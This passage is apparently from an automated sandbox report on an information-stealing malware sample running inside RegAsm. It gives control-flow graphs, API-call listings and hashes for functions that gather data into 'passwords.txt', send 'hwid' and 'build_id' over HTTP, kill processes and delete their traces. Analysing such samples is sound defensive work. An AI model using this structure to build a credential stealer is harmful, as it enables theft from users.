                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425B4C,?,?,?,00425B46,?,00000000), ref: 0040C378
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C3D9
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0040C3E0
                                                                                    • lstrlenA.KERNEL32(00000000,00000000), ref: 0040C470
                                                                                    • lstrcat.KERNEL32(00000000), ref: 0040C487
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C499
                                                                                    • lstrcat.KERNEL32(00000000,00425B50), ref: 0040C4A7
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4B9
                                                                                    • lstrcat.KERNEL32(00000000,00425B54), ref: 0040C4C7
                                                                                    • lstrcat.KERNEL32(00000000), ref: 0040C4D6
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4E8
                                                                                    • lstrcat.KERNEL32(00000000,00425B58), ref: 0040C4F6
                                                                                    • lstrcat.KERNEL32(00000000), ref: 0040C505
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C517
                                                                                    • lstrcat.KERNEL32(00000000,00425B5C), ref: 0040C525
                                                                                    • lstrcat.KERNEL32(00000000), ref: 0040C534
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C546
                                                                                    • lstrcat.KERNEL32(00000000,00425B60), ref: 0040C554
                                                                                    • lstrcat.KERNEL32(00000000,00425B64), ref: 0040C562
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040C596
                                                                                    • memset.MSVCRT ref: 0040C5E9
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040C616
                                                                                      • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                      • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                      • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                      • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                    • String ID: passwords.txt
                                                                                    • API String ID: 3298853120-347816968
                                                                                    • Opcode ID: 4b1ff610774e8c77471883ccd83e1c17f67f4a4143a384f07f00799f4a19b9b8
                                                                                    • Instruction ID: 1ecdebe3f11d8fac3e9d0efa643fe933af64b4fe52e77a22e07e9b20bef025ed
                                                                                    • Opcode Fuzzy Hash: 4b1ff610774e8c77471883ccd83e1c17f67f4a4143a384f07f00799f4a19b9b8
                                                                                    • Instruction Fuzzy Hash: 98C16971800159EEDB15EBE4ED1AEEEBB75BF18304F10403AF511721E1DB782A09DB25
                                                                                    Function 0041390C Relevance: 41.1, APIs: 12, Strings: 11, Instructions: 825sleepCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2048 41390c-4139c5 _EH_prolog call 4135ac call 40f997 * 3 call 40f923 * 6 2069 4139c9-4139d0 call 402283 2048->2069 2072 413a64-413ae5 call 4020f9 call 402113 call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2069->2072 2073 4139d6-413a5f call 4020f9 call 40f9e1 call 40f98e call 40212d call 40f95a call 4010b1 call 41303a call 40f9e1 2069->2073 2103 413b50-413b66 call 40fb4d StrCmpCA 2072->2103 2104 413ae7-413b29 call 40212d call 40f95a call 4010b1 call 41303a 2072->2104 2109 413b47-413b4b call 40f98e 2073->2109 2113 41435b-4143ba call 40f9e1 call 40212d call 40f9e1 call 40f98e call 402286 call 40f9e1 call 40f98e call 4132d9 2103->2113 2114 413b6c-413b73 call 40227f 2103->2114 2131 413b2e-413b41 call 40f9e1 2104->2131 2109->2103 2203 4143bf-414436 call 40f98e * 6 call 413295 call 401061 2113->2203 2121 413b79-413b80 call 402283 2114->2121 2122 413cfd-413d13 call 40fb4d StrCmpCA 2114->2122 2133 413c11-413c92 call 402147 call 402161 call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2121->2133 2134 413b86-413c0c call 402147 call 40f9e1 call 40f98e call 40217b call 402147 call 4010b1 call 41303a call 40f9e1 2121->2134 2135 414316-414356 call 40f9e1 call 40217b call 40f9e1 call 40f98e call 4022a0 2122->2135 2136 413d19-413d20 call 402283 2122->2136 2131->2109 2133->2122 2258 413c94-413cee call 40217b call 40f95a call 4010b1 call 41303a call 40f9e1 2133->2258 2277 413cf4-413cf8 call 40f98e 2134->2277 2211 414266-41428a call 40f9e1 call 40f98e call 4132d9 2135->2211 2153 413d26-413d2d call 402283 2136->2153 2154 413eaa-413ec0 call 40fb4d StrCmpCA 2136->2154 2171 413d33-413db9 call 402195 call 40f9e1 call 40f98e call 4021c9 call 402195 call 4010b1 call 41303a call 40f9e1 2153->2171 2172 413dbe-413e3f call 402195 call 4021af call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2153->2172 2173 4142d1-414311 call 40f9e1 call 4021c9 call 40f9e1 call 40f98e call 4022ba 2154->2173 2174 413ec6-413ecd call 402283 2154->2174 2340 413ea1-413ea5 call 40f98e 2171->2340 2172->2154 2326 413e41-413e9b call 4021c9 call 40f95a call 4010b1 call 41303a call 40f9e1 2172->2326 2173->2211 2197 413ed3-413eda call 402283 2174->2197 2198 414057-41406d call 40fb4d StrCmpCA 2174->2198 2226 413ee0-413f66 call 4021e3 call 40f9e1 call 40f98e call 402217 call 4021e3 call 4010b1 call 41303a call 40f9e1 2197->2226 2227 413f6b-413fec call 4021e3 call 4021fd call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2197->2227 2228 414073-41407a call 402283 2198->2228 2229 41428f-4142cf call 40f9e1 call 402217 call 40f9e1 call 40f98e call 4022d4 2198->2229 2211->2203 2384 41404e-414052 call 40f98e 2226->2384 2227->2198 2377 413fee-414048 call 402217 call 40f95a call 4010b1 call 41303a call 40f9e1 2227->2377 2255 414080-414087 call 402283 2228->2255 2256 4141fe-414214 call 40fb4d StrCmpCA 2228->2256 2229->2211 2290 414118-414199 call 402231 call 40224b call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2255->2290 2291 41408d-414113 call 402231 call 40f9e1 call 40f98e call 402265 call 402231 call 4010b1 call 41303a call 40f9e1 2255->2291 2292 414226-414262 call 40f9e1 call 402265 call 40f9e1 call 40f98e call 4022ee 2256->2292 2293 414216-414221 Sleep 2256->2293 2258->2277 2277->2122 2290->2256 2402 41419b-4141f2 call 402265 call 40f95a call 4010b1 call 41303a call 40f9e1 2290->2402 2407 4141f5-4141f9 call 40f98e 2291->2407 2292->2211 2293->2069 2326->2340 2340->2154 2377->2384 2384->2198 2402->2407 2407->2256
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00413911
                                                                                      • Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413ADD
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0041303A: _EH_prolog.MSVCRT ref: 0041303F
                                                                                      • Part of subcall function 0041303A: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C8A
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413D0B
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413E37
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413EB8
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413FE4
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414065
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414191
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041420C
                                                                                    • Sleep.KERNEL32(0000EA60), ref: 0041421B
                                                                                      • Part of subcall function 00413118: _EH_prolog.MSVCRT ref: 0041311D
                                                                                      • Part of subcall function 00413118: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                                      • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                                      • Part of subcall function 00413118: StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                                      • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                                      • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpylstrlen$Sleep
                                                                                    • String ID: *$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                    • API String ID: 1345713276-3681523784
                                                                                    • Opcode ID: 505f916443a8155cce969c46bc05582c1e74d202306969a7660cc8c93faf51c3
                                                                                    • Instruction ID: ba2ef69668dbee3cc8c09a903ddfb9f5b99e769ff53e208b1ce9b21879ea8b17
                                                                                    • Opcode Fuzzy Hash: 505f916443a8155cce969c46bc05582c1e74d202306969a7660cc8c93faf51c3
                                                                                    • Instruction Fuzzy Hash: 596263B0904248EADB10EBE5C956BDEBBB89F19304F5041BEF445B32C1DB785B4C8766
                                                                                    Function 00403AF5 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 513networkstringfileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2421 403af5-403bc4 _EH_prolog call 40f95a call 403a54 call 40f923 * 5 call 40fb4d InternetOpenA StrCmpCA 2438 403bc6 2421->2438 2439 403bc8-403bcb 2421->2439 2438->2439 2440 403bd1-403d4f call 410b5c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 2 InternetConnectA 2439->2440 2441 404122-4041b1 InternetCloseHandle call 410a94 * 2 call 40f98e * 8 2439->2441 2440->2441 2512 403d55-403d88 HttpOpenRequestA 2440->2512 2513 404119-40411c InternetCloseHandle 2512->2513 2514 403d8e-403d90 2512->2514 2513->2441 2515 403d92-403da2 InternetSetOptionA 2514->2515 2516 403da8-4040b3 call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40f923 call 40fa28 * 2 call 40f9e1 call 40f98e * 2 call 40fb4d lstrlenA call 40fb4d * 2 lstrlenA call 40fb4d HttpSendRequestA 2514->2516 2515->2516 2627 4040ef-404104 InternetReadFile 2516->2627 2628 4040b5-4040ba 2627->2628 2629 404106-404114 InternetCloseHandle call 40f98e 2627->2629 2628->2629 2631 4040bc-4040ea call 40fa9c call 40f9e1 call 40f98e 2628->2631 2629->2513 2631->2627
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00403AFA
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403D44
                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403D7E
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403DA2
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00425975,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 0040407E
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404097
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004040A8
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004040FC
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404107
                                                                                    • InternetCloseHandle.WININET(?), ref: 0040411C
                                                                                    • InternetCloseHandle.WININET(?), ref: 00404125
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                    • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                    • API String ID: 1139859944-3346224549
                                                                                    • Opcode ID: 6763fc035234d5979cabe930e44d953dfd0e215cef660ea1f11e82d7fcc9c962
                                                                                    • Instruction ID: b0e5e0d41a604fbf99728ef0725b538a38cb0714067dfec9b32dda745c4f151e
                                                                                    • Opcode Fuzzy Hash: 6763fc035234d5979cabe930e44d953dfd0e215cef660ea1f11e82d7fcc9c962
                                                                                    • Instruction Fuzzy Hash: 31223AB190414CEADB11EBE4C956BEEBBB8AF18308F5041BEE50573582DB781B4CCB65
                                                                                    Function 00406737 Relevance: 33.5, APIs: 22, Instructions: 511stringmemoryfileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2741 406737-406760 _EH_prolog call 40fb28 2744 406762-40676a 2741->2744 2745 40676c-40677f call 40fb28 2741->2745 2746 40678a call 40f997 2744->2746 2750 406785 2745->2750 2751 406847-406854 call 40fb28 2745->2751 2752 40678f-406845 call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 2746->2752 2750->2746 2751->2752 2757 40685a-406876 call 40f98e * 2 2751->2757 2789 406894-4068b0 call 40fb4d * 2 CopyFileA 2752->2789 2768 406e08-406e29 call 40f98e call 401061 2757->2768 2794 4068b2-4068dd call 40f923 call 40fa9c 2789->2794 2795 40687b-406891 call 40f95a call 411056 2789->2795 2804 4068e3-406971 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 2794->2804 2805 406976-406a4a call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40fa9c call 40f9e1 call 40f98e 2794->2805 2795->2789 2846 406a4d-406a6d call 40f98e call 40fb4d 2804->2846 2805->2846 2859 406a73-406a8e 2846->2859 2860 406db6-406dc8 call 40fb4d DeleteFileA call 40fb14 2846->2860 2867 406da2-406db5 2859->2867 2868 406a94-406aaa GetProcessHeap RtlAllocateHeap 2859->2868 2871 406dcd-406e05 call 40fb14 call 40f98e * 4 2860->2871 2867->2860 2870 406d1e-406d2b 2868->2870 2878 406d31-406d3d lstrlenA 2870->2878 2879 406aaf-406b5c call 40f923 * 6 call 40fb28 2870->2879 2871->2768 2881 406d93-406d9f memset 2878->2881 2882 406d3f-406d7d lstrlenA call 40f95a call 4010b1 call 414437 2878->2882 2916 406b66 2879->2916 2917 406b5e-406b64 2879->2917 2881->2867 2897 406d82-406d8e call 40f98e 2882->2897 2897->2881 2918 406b6c-406b83 call 40f997 call 40fb28 2916->2918 2917->2918 2923 406b85-406b8b 2918->2923 2924 406b8d 2918->2924 2925 406b93-406ba4 call 40f997 call 40fb41 2923->2925 2924->2925 2930 406bb3-406d19 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 2 call 4063b1 call 40fb4d lstrcat call 40f98e lstrcat call 40f98e * 6 2925->2930 2931 406ba6-406bae call 40f997 2925->2931 2930->2870 2931->2930
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040673C
                                                                                      • Part of subcall function 0040FB28: StrCmpCA.SHLWAPI(?,?,?,00408A88,00425D7C,00000000), ref: 0040FB31
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425B78,?,?,?,00425B4E,?,00000000), ref: 004068A8
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00411056: _EH_prolog.MSVCRT ref: 0041105B
                                                                                      • Part of subcall function 00411056: memset.MSVCRT ref: 0041107D
                                                                                      • Part of subcall function 00411056: OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 00411104
                                                                                      • Part of subcall function 00411056: TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 00411112
                                                                                      • Part of subcall function 00411056: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00411119
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406A9A
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00406AA1
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00406BBF
                                                                                    • lstrcat.KERNEL32(00000000,00425B94), ref: 00406BCD
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00406BDF
                                                                                    • lstrcat.KERNEL32(00000000,00425B98), ref: 00406BED
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00406D34
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00406D42
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • memset.MSVCRT ref: 00406D9A
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00406DBF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 4187064601-0
                                                                                    • Opcode ID: 8e1653efa4f5854faced7d70c72396407c3d3c249bef8c47c695785d4c6cb76f
                                                                                    • Instruction ID: ba7657a0882041a922700d4e4b68e078784f46e31e746cb862f522f044a4a9e6
                                                                                    • Opcode Fuzzy Hash: 8e1653efa4f5854faced7d70c72396407c3d3c249bef8c47c695785d4c6cb76f
                                                                                    • Instruction Fuzzy Hash: 9F224771904248EEDF15EBE4DD56AEEBB75AF18308F50407EF402721D2DB782A09DB26
                                                                                    Function 00408759 Relevance: 33.4, APIs: 22, Instructions: 407stringmemoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040875E
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
